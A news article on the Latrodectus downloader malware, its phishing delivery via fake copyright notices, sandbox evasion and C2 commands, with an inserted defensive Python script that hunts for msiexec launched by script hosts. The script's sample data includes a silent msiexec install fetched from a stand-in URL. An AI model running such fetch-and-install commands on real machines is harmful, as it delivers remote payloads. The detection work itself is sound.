Beware of “Latrodectus” – this malware may be in your inbox

08 April 2024 | Pressroom | Cybercrime/network security


Threat hunters have discovered a new malware called Latrodectus, which has been distributed in email phishing campaigns since at least the end of November 2023.

“Latrodectus is an emerging downloader with various sandbox evasion capabilities,” researchers from Proofpoint and Team Cymru said in a joint analysis published last week, adding that it is designed to retrieve payloads and execute arbitrary commands.

There is evidence to suggest that the malware is likely written by the same threat actors behind the IcedID malware, with the downloader used by Initial Access Brokers (IABs) to facilitate the distribution of other malware.

Latrodectus has been linked primarily to two different IABs tracked by Proofpoint under the names TA577 (aka Water Curupira) and TA578, the former of which has also been linked to the distribution of QakBot and PikaBot.

As of mid-January 2024, it has been used almost exclusively by TA578 in email threat campaigns, in some cases transmitted via a DanaBot infection.


TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.

Attack chains exploit contact forms on websites to send legal threats alleging copyright infringement to targeted organizations. Links embedded in messages direct recipients to a fake website to trick them into downloading a JavaScript file responsible for launching the main payload using msiexec.
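The chain described above ends with a JavaScript file launching the payload through msiexec, which gives defenders a concrete process-lineage pattern to hunt for. The following detection logic is an added example, not code from the article or from Proofpoint/Team Cymru; it assumes the .js file runs under the standard Windows script hosts (wscript.exe/cscript.exe) and uses constructed process-creation events with assumed field names rather than real telemetry.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry); the
# field names are an assumption about what a Sysmon/EDR export provides.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3988, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\bob\Downloads\copyright_claim.js"'},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://example.invalid/pkg.msi /qn"},
    {"pid": 5000, "ppid": 800, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\vendor.msi /qn"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumed hosts for .js files
REMOTE_MSI = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path on any host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_suspicious_msiexec(events: List[Dict]) -> List[Dict]:
    """Flag msiexec launches whose parent is a script host or whose
    installer argument points at a URL; benign local installs pass."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe":
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in SCRIPT_HOSTS:
            reasons.append("parent is a script host")
        if REMOTE_MSI.search(e["cmdline"]):
            reasons.append("installer fetched from a URL")
        if reasons:
            alerts.append({"pid": e["pid"], "reasons": reasons,
                           "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_msiexec(SAMPLE_EVENTS):
        print(alert["pid"], "; ".join(alert["reasons"]), alert["cmdline"])
```

Only the second event is flagged: it is spawned by wscript.exe and pulls its package from a URL, while the locally sourced install from an unrelated parent is left alone.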

“Latrodectus will publish encrypted system information to the command and control (C2) server and request the bot to be downloaded,” the researchers said. “Once the bot registers with C2, it sends command requests from C2.”


It also includes checks to detect whether it is running in a sandbox: the host must have a valid MAC address and, on Windows 10 or later, at least 75 running processes.

As is the case with IcedID, Latrodectus is designed to send registration information in a POST request to the C2 server where the fields are HTTP parameters strung together and encrypted, after which it waits for further instructions from the server.

The commands allow the malware to enumerate files and processes, execute binaries and DLLs, execute arbitrary directives via cmd.exe, update the bot, and even stop a running process.


Further examination of the attacker’s infrastructure reveals that the first C2 servers went live on September 18, 2023. These servers, in turn, are configured to communicate with an upstream Tier 2 server installed around August 2023.

Latrodectus’s connections to IcedID arise from the T2 server “maintaining connections to the backend infrastructure associated with IcedID” and the use of jump boxes previously associated with IcedID operations.

“Latrodectus will be increasingly used by financially motivated threat actors across the criminal landscape, particularly those previously distributing IcedID,” Team Cymru assessed.
